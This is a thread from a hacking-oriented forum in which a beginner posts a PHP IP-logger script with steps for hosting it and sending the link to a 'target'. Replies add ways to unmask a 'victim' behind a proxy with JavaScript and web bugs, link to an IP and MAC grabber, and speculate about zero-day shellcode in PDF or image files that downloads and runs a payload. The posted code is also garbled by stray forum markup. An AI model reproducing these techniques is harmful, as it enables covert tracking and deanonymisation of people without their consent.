Finally Figured Out How To Get IP's Easily (Newbie)

For beginners, flames not allowed...(just by the staff :P)
acidburnz

Finally Figured Out How To Get IP's Easily (Newbie)

Post by acidburnz »

Register a free account @ 000webhost.com (free webhosting)

Used "Notepad++"
Saved a file called "index.php" with a code

<?php
$ip = $_SERVER['REMOTE_ADDR'];
$dt = date("l dS \of F Y h:i:s A");
$file=fopen("ip_log.txt","a");
$data = $ip.' '.$dt."\n";
fwrite($file, $data);
fclose($file);
header( 'Location: https://namesomething.com'" onclick="window.open(this.href);return false;" onclick="window.open(this.href);return false;) ;
?>

Made a new text file called "ip_log"
Go back to my Control Panel at 00webhost
Opened "File Manager"
Clicked "public.html"
Delete "default.php"
Uploaded the two files "index.php & ip_log.txt"

Now send the target the domain name that you created when you registered with 00webhost.com , now go back to your CP and click on "ip_log" , there should be the targets IP address.

-this is the easiest way to get someones ip address-

ph0bYx
Staff Member
Staff Member

Re: Finally Figured Out How To Get IP's Easily (Newbie)

Post by ph0bYx »

Just what I've been searching for in a while, thank you! :)

ayu
Staff
Staff

Post by ayu »

Another way that you could do it, without registering on free services and such.
Is to install some service on your computer at home, say Apache, or even a Minecraft server, and then have your victim connect to it, the service will log it :)

But indeed, I agree that the method you posted, is one of the absolute easiest and best ones :)
"The best place to hide a tree, is in a forest"

DNR
Digital Mercenary
Digital Mercenary

Post by DNR »

proxies?

DNR
-
He gives wisdom to the wise and knowledge to the discerning. He reveals deep and hidden things; he knows what lies in Darkness, and Light dwells with him.

ayu
Staff
Staff

Post by ayu »

DNR wrote:proxies?

DNR
Yeah, if the person uses a completely anonymous proxy, then it will be hard ^^.
But then we have stuff like Java and JavaScript on sites that could be used to send hidden requests to other sites where the proxy isn't used.
Thus getting the real IP.
"The best place to hide a tree, is in a forest"

DNR
Digital Mercenary
Digital Mercenary

Post by DNR »

anyone try to craft a webbug to be hosted on the same servers as your crafted http pages.

Perhaps we need to get a person to open a file on his computer while off proxy - when the file is opened, the webbug will request the 1x1 pixel bug - thus revealing the user behind a proxy.
what if the webbug could be activated when the computer boots up and prior to users starting a proxy.

DNR
-
He gives wisdom to the wise and knowledge to the discerning. He reveals deep and hidden things; he knows what lies in Darkness, and Light dwells with him.

acidburnz

Post by acidburnz »

Nice, I know all the methods already :D , I'm still a noob but i'm getting far with learning daily. *thumb*

J9NF
forum buddy
forum buddy

Post by J9NF »

Code: Select all

Request.ServerVariables["HTTP_X_FORWARDED_FOR"]
Using this might help if the visitor is behind a proxy. It won't work with all proxies, but this will give you an array of IP's, starting with the originating IP if a proxy was used. Here's some info from our lord and savior, Wikipedia: http://en.wikipedia.org/wiki/X-Forwarded-For

J9NF
forum buddy
forum buddy

Post by J9NF »

DNR,
anyone try to craft a webbug to be hosted on the same servers as your crafted http pages.

Perhaps we need to get a person to open a file on his computer while off proxy - when the file is opened, the webbug will request the 1x1 pixel bug - thus revealing the user behind a proxy.

what if the webbug could be activated when the computer boots up and prior to users starting a proxy.
What you are talking about might be accomplished with something like miniDuke: a 0-day in a pdf or jpg that discreetly loads and executes shellcode written in assembly when the file is opened. I'm no assembly expert, but there must be a way to write the shellcode so that it downloads and executes another file that contains more instructions (the kind that gets the infected person's IP and log it on an external server) -- because I don't think it can all be done in assembly.

--Janine

scatter
Fame ! Where are the chicks?!

Post by scatter »

nice :D
but here are some more nice tricks but that get you the ip when clicking on the pic and it gets you mac adress too ^_^

http://code.suck-o.com/42556" onclick="window.open(this.href);return false;" onclick="window.open(this.href);return false;

and for the mac adress trick
http://www.qualitycodes.com/tutorial.ph ... t-Explorer" onclick="window.open(this.href);return false;" onclick="window.open(this.href);return false;

you can look around and you will get it to work on all browsers not only IE :)

scatter

Post by scatter »

oh and btw if the person is behind a proxy there is a js code to pop up a page and bypass his proxy ;) and he would be safe unless he has noscript plugin installed

scatter

Post by scatter »

What you are talking about might be accomplished with something like miniDuke: a 0-day in a pdf or jpg that discreetly loads and executes shellcode written in assembly when the file is opened. I'm no assembly expert, but there must be a way to write the shellcode so that it downloads and executes another file that contains more instructions (the kind that gets the infected person's IP and log it on an external server) -- because I don't think it can all be done in assembly.

--Janine
Jamine, what you are talking about is some embedded html and js code inside pdf files and documents that can trace the download of files and its a security measure that can be made to follow important or secret files and trace where they went in case of stealing

J9NF
forum buddy
forum buddy

Post by J9NF »

Well, that's great, then! If you don't need to use assembly, getting the original IP is even easier. \:D/ (not to say that the other was was easy, because i know how it works in theory... but, not in practice. 8-[ )